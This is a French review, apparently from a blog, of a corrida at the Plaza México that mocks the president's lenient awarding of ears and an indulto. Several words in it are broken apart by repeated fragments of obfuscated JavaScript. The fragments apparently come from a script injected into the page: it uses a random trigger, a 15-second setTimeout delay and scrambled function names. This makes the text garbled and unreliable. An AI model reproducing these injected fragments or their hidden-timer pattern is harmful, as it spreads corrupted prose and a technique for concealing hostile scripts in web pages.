ARENES DE MEXICO TROIS OREILLES POUR PLAISANTER ET UNE GRACE POUR EN RIRE

Si on n’est pas à la hauteur d’un toro de combat, l’oreille, non demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andée par l’ensemble du public, est une plaisanterie présidentielle, comme cela est arrivé avec le premier de l’après-midi. Et si à un toro manso on ne lui fait rien –sauf le tuer d’une estocade-, concéder deux oreilles à son matador est une double plaisanterie, comme c’est arrivé au cinquième. La corrida de Reyes Huerta présenta deux toros braves et bien présentés, quatre plutôt mansos, avec peu de trapio, les restants, et une toro extrêmement noble, à peine piqué et avec très peu d’agressivité, le sobrero.

À la muleta il obéit très bien à El Fandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andi, mais au milieu d’une très longue faena il s’ennuya, il sortait des passes avec la tête haute, et il se déplaçait plus que chargeait. Mais voilà que les gens demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andèrent l’indulto, une plaisanterie, et le président l’accorda, il valait mieux en rire. Conclusion, les triomphes de Pizarro, El Zapata et El Fandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andi étaient faussés et ne servent à rien.

Et ils ne servent pas non plus aux arènes de Mexicon, sur la mauvaise pente à cause d’un palco présidentiel ridicule, qui lui ôte son prestige corrida après corrida. Quels toreros, quels toros, quels aficionados viendront mettre un peu d’ordre dans ces arènes historiques qui ont aujourd’hui peu de public et encore moins d’aficion ?

 

Les commentaires sont fermés.